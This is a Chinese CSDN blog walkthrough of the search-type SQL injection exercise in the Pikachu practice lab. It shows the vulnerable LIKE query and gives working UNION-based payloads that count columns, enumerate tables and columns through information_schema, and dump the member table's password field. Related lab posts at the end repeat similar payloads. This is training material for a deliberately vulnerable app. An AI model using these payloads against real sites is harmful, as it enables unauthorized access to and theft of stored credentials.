pikachu的搜索型注入

最新推荐文章于 2024-05-24 08:00:00 发布
最新推荐文章于 2024-05-24 08:00:00 发布
阅读量749 收藏
点赞数
分类专栏: pikachu靶机 文章标签: 安全 firefox mysql windows php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/117907824
版权
本文详细介绍了利用SQL注入技术针对Pikachu数据库进行攻击的过程,包括原理分析、操作步骤和逐步暴露敏感信息的方法。从字段验证到数据库爆破,展示了黑客如何利用'like'和'union'操作获取数据权限。
摘要由CSDN通过智能技术生成

pikachu的搜索型注入

一、原理

$sql="select * from user where password like '%$pwd%' order by password"

“%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。
构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下
xxxx%’ or 1=1#

二、操作

打开进入界面:
在这里插入图片描述
在这里插入图片描述
然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,输入’ and 1=1 order by 3#时返回了正常页面:
在这里插入图片描述
而输入’ and 1=1 order by 4#时就回显了报错:
在这里插入图片描述
证明字段数为3。
然后输入’ and 1=2 union select 1,2,3#,回显了1、2、3:
在这里插入图片描述
证明1,2,3都可以回显。
输入’ and 1=2 union select 1,2,(database())#就可以爆出当前使用的数据库pikachu:
在这里插入图片描述
输入’ and 1=2 union select 1,2,table_name from information_schema.columns where table_schema=‘pikachu’#,就得到了pikachu数据库下的所有表名:
在这里插入图片描述

接着随便选一个表,输入’ and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘member’#,得到member表下的所有字段名:
在这里插入图片描述

然后输入’ and 1=2 union select 1,2,pw from pikachu.member#,就得到了字段pw的内容:
在这里插入图片描述

weixin_50339082
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu搜索注入
weixin_43622525的博客
03-07 6854
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
Pikachu搜索注入
xdjxi的博客
03-07 849
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,返回了正常页面然后我们可以输入’ and 1...
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 1534
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
手动漏洞挖掘 Pikachu搜索注入
胡乱写点什么
06-23 200
手动漏洞挖掘(三) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— Pikachu搜索注入 —— 需要的工具: pikachu 一.过程 搜索 因为会自动匹配到username,所以可以联想到这段语句使用了mysql的模糊查询。sql语句可能为:Where username like ’%a%‘。我们先尝试闭合,然后再注释,看是否能正常返回。 可以正常返回,然后判断列数 a%’ order by 4 # --报错 a%’ order by 3 #
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
pikachu.rar
03-05
Pikachu:本地测试环境与SQL注入攻防详解》 "Pikachu.rar" 是一个专为Web安全攻防设计的压缩包文件,其主要内容是搭建一个详尽的漏洞平台,便于用户进行SQL注入测试以及靶场环境的构建。在这个环境中,我们可以...
sql注入之数字注入
08-02
pikachu 靶场里的数字注入为例子。可以使用 burpsuite 抓包,使用重发器模块来 inject 恶意输入。 1. 判断是否存在漏洞:输入 and 1=1,界面正确返回;输入 and 1=2,界面显示出错,由此说明存在注入漏洞。 2....
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu之特殊注入搜索注入、xx注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1276
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
pikachu靶场的搜索注入
ranioe的博客
12-08 3425
搜索注入 搜索vince 测试该传参点是否可以注入 搜索vince’看看能不能注入 说明这个传参点可注入,并且返回了部分代码’%” 说明源代码不是使用”闭合的。猜测源代码的闭合方式’%username%’ 猜测源代码的闭合方式’%username%’ 使用语句:正确返回的内容 %’ 注入sql语句 # and 1=1 返回正常,and 1=2报错,说明可以开始注入 尝试mysql联合查询注入 先判断字段数 当字段为4报错,说明字段数为3。确定字段数为3 查询可回显位 说明字段1,2,3
Pikachu SQL注入搜索注入
SS_liang的博客
01-11 544
无论是搜索还是字符,都是需要找到闭合的方式也就是闭合的字符,然后进行sql注入:这里我直接梭哈,原理都一样就没必要再详细说一遍了,前面的文章都有: 最后结果就是:这题闭合符号是%'拿下!
SQL注入学习记录Pikachu漏洞练习平台 搜索注入
qq_45653588的博客
05-27 545
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 其中又分为POST/GET,GET的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索注入又称为文本框注入。 2)原理 $sql="select * from user where password like '
pikachu SQL注入搜索
ANYOUZHEN的博客
05-09 227
观察后端代码,尝试构造合法闭合 payload:xxxx%' or 1=1# 成功注入,#在MySQL数据库中起到注释的作用,可以去掉后面的代码
Pikachu靶场 搜索SQL注入
感谢关注
12-23 629
输入下面的命令,再输入。
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1124
目录 一、数字注入(post) 二、字符输入(get) 三、搜索注入 四、xx注入 五、“insert/update”注入 六、“delete”注入 七、“http header”注入 八、盲注(base on boolian) 九、盲注(base on time) 十、宽字节注入 十一、手工测试流程 十二、报错利用流程 一、数字注入(post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
搜索注入
haodawei123的博客
01-17 1955
如上面的这样的带搜索框的,输入单引号测试 出现错误就存在搜索注入漏洞 第一步:输入单引号点击搜索 出错就是典搜索注入 第二步:用一个关键字来判断 1%’ and 1=1 and ‘%’=’ 返回正常 1%’ and 1=2 and ‘%’=’ 返回错误 第三步:用抓包工具抓包 sel_big=1&text_key=1&input.x=28&input.y=11 构造...
pikachu sql数字注入
最新发布
06-21
Pikachu SQL数字注入通常指的是SQL注入攻击的一种形式,攻击者利用用户输入中包含的数字来进行恶意SQL查询。在Web应用程序中,如果对用户输入的数字字段没有进行充分的验证和过滤,就可能导致这种类注入攻击。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值